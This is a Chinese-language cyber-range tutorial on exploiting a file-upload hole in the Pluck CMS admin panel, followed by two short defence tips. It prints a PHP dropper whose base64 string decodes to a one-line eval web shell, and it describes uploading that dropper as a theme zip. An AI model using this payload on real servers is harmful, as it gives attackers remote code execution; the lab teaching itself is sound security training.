网络安全检测与防护技术
国家地方联合工程研究中心深圳分中心

靶场科普 | 文件上传实战之pluck

发表时间:2021-09-06 19:31

本文由“网络安全检测与防护技术国家地方联合工程研究中心深圳分中心——东塔网络安全学院”总结归纳

靶场介绍:

文件上传实战之pluck

靶场科普 | 文件上传实战之pluck


今天,给大家介绍一下“东塔攻防世界”其中的一个靶场:“文件上传实战之pluck”。


一、实验介绍

1.pluck是一个小型简单的内容管理系统,由PHP写成。即使你没有编程语言知识,也可以很容易地使用它来管理站点,功能有给页面插照片、在blog里写文章、分享照片等

2.pluck cms后台存在文件上传漏洞,攻击者可以利用该漏洞获取获取服务器权限

靶场科普 | 文件上传实战之pluck


二、实验目的

1.掌握pluck的概念

2.了解当Pluck CMS后台存在文件上传漏洞时,攻击者怎么利用该漏洞获取服务器权限。


三、实验步骤

1.打开实验靶场,了解上传点,以及利用方法,登录密码为:admin

2.准备一个info.php,内容为:file_put_contents('hack.php',base64_decode('PD9waHAgZXZhbCgkX0dFVFsnYSddKTs/Pg=='));?>

3.然后打包压缩成shell.zip,上传安装主题,然后点击回到主题页,此时触发文件包含。


四、防御方法

1.对上传的文件进行严格检测

2.上传后的文件名进行重命名,并且隐藏上传后文件的路径,不容易被猜到